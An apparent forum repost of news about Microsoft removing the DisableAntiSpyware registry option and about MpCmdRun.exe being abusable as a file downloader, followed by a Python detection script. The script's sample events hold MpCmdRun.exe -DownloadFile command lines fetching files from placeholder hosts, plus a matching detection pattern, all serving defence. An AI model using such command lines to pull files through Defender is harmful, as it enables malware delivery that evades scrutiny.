Author Topic: Microsoft quietly makes huge change to Windows 10’s antivirus tool  (Read 194 times)

Offline javajolt



Recently, it was discovered that Microsoft is no longer allowing consumers to disable the Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lipped on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the whole controversy.

Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via Windows Registry. However, Microsoft says it has retired the legacy option to disable the antivirus because it no longer makes any sense in the latest version of Defender.

Windows Defender is designed to turn off automatically whenever users try to install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft.

‘DisableAntiSpyware’ is designed only for IT pros and admins to disable the antivirus engine whenever they need to install their own security product.



“The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted.

By retiring this feature, Microsoft will also prevent attackers from turning off Windows Defender.

Windows Defender can now download files

A report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has been updated with a new feature that could be abused by attackers to download malware from the internet.

According to security researcher Askar, Windows Defender has been updated with a new command-line feature called “MpCmdRun.exe”, otherwise known as Microsoft Antimalware Service Command Line Utility.

Security researcher Askar claims that these changes to the Windows Defender-powered command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). In other words, hackers can abuse these binaries and download any file from the internet, including malware.

It also means that users will be able to use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw as files are still checked by Windows Defender after you finish the download using the command-line tool.

In theory, the Windows Defender tool can’t be used to download any malware that could infect your system, but this is an odd change, and security researchers believe that it could be abused.

source
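A defender-side check for the MpCmdRun.exe download behaviour described in the post, as an added example that is not part of the original post: it scans process-creation events for MpCmdRun.exe command lines that request a download or carry a URL. The event shape (`host`, `image`, `cmdline`), the sample events, and the function name are constructed for illustration; the option name `-DownloadFile` is the tool's own switch and is not named in the post.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (field names are an assumption, modelled
# on what an EDR or Sysmon-style log would carry: image path + command line).
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"host": "ws-02", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r"MpCmdRun.exe -DownloadFile -url https://files.example.invalid/a.bin "
                r"-path C:\Users\Public\a.bin"},
    {"host": "ws-03", "image": r"c:\program files\windows defender\mpcmdrun.exe",
     "cmdline": r'mpcmdrun.exe -downloadfile -URL "http://203.0.113.7/x" -path "C:\Temp\x"'},
    {"host": "ws-04", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r"MpCmdRun.exe -SignatureUpdate"},
    {"host": "ws-05", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://files.example.invalid/a.bin"},  # other binary: out of scope
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Switch must start a token, so a path that merely contains the word is ignored.
DOWNLOAD_SWITCH_RE = re.compile(r"(?<!\S)-downloadfile\b", re.IGNORECASE)


def find_mpcmdrun_downloads(events):
    """Return one finding per MpCmdRun.exe event that looks like a network download."""
    findings = []
    for ev in events:
        # Windows file names are case-insensitive; compare the basename only.
        if PureWindowsPath(ev["image"]).name.lower() != "mpcmdrun.exe":
            continue
        cmd = ev["cmdline"]
        has_switch = DOWNLOAD_SWITCH_RE.search(cmd) is not None
        urls = URL_RE.findall(cmd)
        # Routine scans and signature updates carry neither a switch nor a URL.
        if has_switch or urls:
            findings.append({"host": ev["host"], "download_switch": has_switch, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in find_mpcmdrun_downloads(SAMPLE_EVENTS):
        print(f"{f['host']}: MpCmdRun.exe download, urls={f['urls']}")
```

Routine scans and signature updates pass through unflagged, so any hit is worth correlating with the file written to the destination path and the account that launched the process.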